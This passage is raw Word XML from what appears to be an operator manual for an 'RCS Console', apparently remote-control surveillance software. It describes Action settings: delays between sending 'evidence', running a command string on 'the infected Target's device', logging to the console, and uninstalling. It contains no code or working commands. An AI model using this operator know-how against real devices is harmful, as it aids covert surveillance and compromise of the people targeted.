                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Min delay</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00551C65" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the minimum delay </w:t>
            </w:r>
            <w:r w:rsidR="00141F2F" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>between sending each evidence.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Max delay</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00141F2F" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the maximum delay between sending each evidence.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stop on success</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">specifies to </w:t>
            </w:r>
            <w:r w:rsidR="002954E4" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>prevent the execution</w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of all subsequent Subactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F11436" w:rsidRDefault="00F11436" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11436" w:rsidRDefault="00F11436" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabell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1A6B03" w:rsidTr="00145C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B20850" w:rsidRDefault="00B20850" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B20850" w:rsidRDefault="0010013A" w:rsidP="00B20850">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.17</w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A6B03" w:rsidRPr="00A52C9B" w:rsidRDefault="00B20850" w:rsidP="00B20850">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(Execute)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1104" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:186pt;z-index:251743232;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId128" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1104" DrawAspect="Content" ObjectID="_1446455360" r:id="rId129"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A6B03" w:rsidRDefault="001A6B03" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A6B03" w:rsidRPr="00145C50" w:rsidRDefault="001A6B03" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001A6B03" w:rsidRPr="00145C50" w:rsidRDefault="001A6B03" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001A6B03" w:rsidRPr="00145C50" w:rsidRDefault="001A6B03" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002954E4" w:rsidRPr="00145C50" w:rsidRDefault="002954E4" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001A6B03" w:rsidRPr="00145C50" w:rsidRDefault="001A6B03" w:rsidP="001A6B03">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="002954E4" w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the command string to be executed on the infected Target’s device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>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FB39EA" w:rsidTr="00145C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00145C50" w:rsidRDefault="00145C50" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRDefault="0010013A" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.18</w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00A52C9B" w:rsidRDefault="00145C50" w:rsidP="00145C50">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(Log)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1112" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:206.25pt;z-index:251751424;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId130" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1112" DrawAspect="Content" ObjectID="_1446455361" r:id="rId131"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FB39EA" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00C93347" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00C93347" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00C93347" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="00C93347" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002954E4" w:rsidRPr="00C93347" w:rsidRDefault="002954E4" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00C93347" w:rsidRDefault="00C93347" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00C93347" w:rsidRDefault="00FB39EA" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Text</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="002954E4" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the log string that you want to store on the Console.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FB39EA" w:rsidRDefault="00FB39EA" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB39EA" w:rsidRDefault="00FB39EA" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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FB39EA" w:rsidTr="00145C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FB39EA" w:rsidRDefault="003A4380" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1113" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:184.5pt;z-index:251753472;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId132" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1113" DrawAspect="Content" ObjectID="_1446455362" r:id="rId133"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRDefault="0010013A" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.19</w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00145C50">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00145C50" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="00A52C9B" w:rsidRDefault="00145C50" w:rsidP="00145C50">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(Uninstall)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FB39EA" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
